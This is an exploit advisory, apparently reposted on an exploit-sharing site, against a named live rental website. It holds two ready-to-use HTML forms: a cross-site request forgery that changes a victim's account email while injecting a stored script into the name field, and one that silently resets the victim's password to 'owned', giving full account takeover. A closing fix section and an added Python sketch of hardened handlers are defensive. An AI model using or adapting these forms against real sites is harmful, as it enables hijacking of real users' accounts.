|\        /|  |  --------  |\        /| -------/  |---------/
| \      / |  |     |      | \      / |       /   |        /
|  \    /  |  |     |      |  \    /  |      /    |       /
|   \  /   |  |     |      |   \  /   |     /     |      /
|    \/    |  |     |      |    \/    |    /      |     /
|          |  |     |      |          |   /       |----/
|          |  |     |      |          |  /-----   |    \
|          |  |     |      |          |       /   |     \
|          |  |     |      |          |      /    |      \
|          |  |     |      |          |     /     |       \
|          |  |     |      |          |    /      |        \
|          |  |     |      |          |   /       |         \
|          |  |     |      |          |  /        |          \ @mitm3r
-----------------------------------------------------------------------------------------------
Site: https://www.rentmystay.com/
-----------------------------------------------------------------------------------------------

######################
# Exploit Title : Rentmystay CSRF + XSS account takeover
# Exploit Author : mitm3r
# Contact: [email protected]
# Vendor Homepage : https://www.rentmystay.com/
# Tested On : Windows 10 / Linux Mint
######################
# Target:
https://www.rentmystay.com/

# Vulnerable link 1
https://www.rentmystay.com/account/account_settings [TAKEOVER WITH EMAIL]

# Exploit

<html>
  <body>
    <form action="https://www.rentmystay.com/account/account_settings" method="POST">
      <input type="hidden" name="settings_email" value="[email protected]" />
      <input type="hidden" name="contact_num" value="9979608585" />
      <input type="hidden" name="settings_firstname" value="attacker"><script>alert('Owned')</script>" />
      <input type="hidden" name="settings_lastname" value="Attacker" />
      <input type="hidden" name="settings_dob_month" value="" />
      <input type="hidden" name="settings_dob_day" value="" />
      <input type="hidden" name="settings_dob_year" value="" />
      <input type="hidden" name="settings_gender" value="" />
      <input type="hidden" name="occupation" value="tester" />
      <input type="hidden" name="interests" value="" />
      <input type="hidden" name="work" value="" />
      <input type="hidden" name="education" value="" />
      <input type="hidden" name="location" value="" />
      <input type="hidden" name="settings_country" value="in" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

# Vulnerable link 2
https://www.rentmystay.com/account/account-password [TAKEOVER WITH PASSWORD]

# Exploit

<html>
  <body>
    <form action="https://www.rentmystay.com/account/account-password" method="POST">
      <input type="hidden" name="password_new_password" value="owned" />
      <input type="hidden" name="password_retype_new_password" value="owned" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

# Fix/Patch

Use an anti-CSRF token on every state-changing form on the site, and for the password-change CSRF at least require the 'Current password' field in the password change form.
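
The two fixes above, as an added example that is not part of the original advisory or the vendor's code: a stdlib-only Python sketch of hardened handlers for the two endpoints. A synchronizer token kept in the server-side session rejects the cross-site forms shown in the PoCs, the password handler additionally demands the current password, and the profile handler HTML-encodes settings_firstname so the injected script tag is stored as inert text. Session and user store are constructed in-memory dicts; the field name password_current is an assumption.

```python
import hashlib
import hmac
import html
import secrets

def hash_pw(password, salt):
    # Salted PBKDF2, as a user store would hold it; not the vendor's scheme.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def new_user(password):
    # Constructed test account standing in for the victim's record.
    salt = secrets.token_bytes(16)
    return {"salt": salt, "pw_hash": hash_pw(password, salt), "settings_firstname": ""}

def issue_csrf_token(session):
    """Synchronizer token: generated server-side, kept in the session, echoed in each form."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

def csrf_token_valid(session, form):
    """A cross-site form cannot read the victim's session token, so it fails this check."""
    expected = session.get("csrf_token")
    return bool(expected) and hmac.compare_digest(expected, form.get("csrf_token", ""))

def handle_account_settings(session, form):
    """Hardened account_settings handler: token check plus HTML encoding of the name field."""
    if not csrf_token_valid(session, form):
        return 403, "missing or invalid anti-CSRF token"
    user = session["user"]
    # Encoded on input here for brevity; encoding at render time is the usual place.
    user["settings_firstname"] = html.escape(form.get("settings_firstname", ""), quote=True)
    return 200, "settings saved"

def handle_password_change(session, form):
    """Hardened account-password handler: token check plus proof of the current password."""
    if not csrf_token_valid(session, form):
        return 403, "missing or invalid anti-CSRF token"
    user = session["user"]
    supplied = hash_pw(form.get("password_current", ""), user["salt"])
    if not hmac.compare_digest(supplied, user["pw_hash"]):
        return 403, "current password incorrect"
    new = form.get("password_new_password", "")
    if not new or new != form.get("password_retype_new_password"):
        return 400, "new passwords empty or do not match"
    user["salt"] = secrets.token_bytes(16)  # rotate salt with the password
    user["pw_hash"] = hash_pw(new, user["salt"])
    return 200, "password changed"
```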

# siph0n [2018-12-10]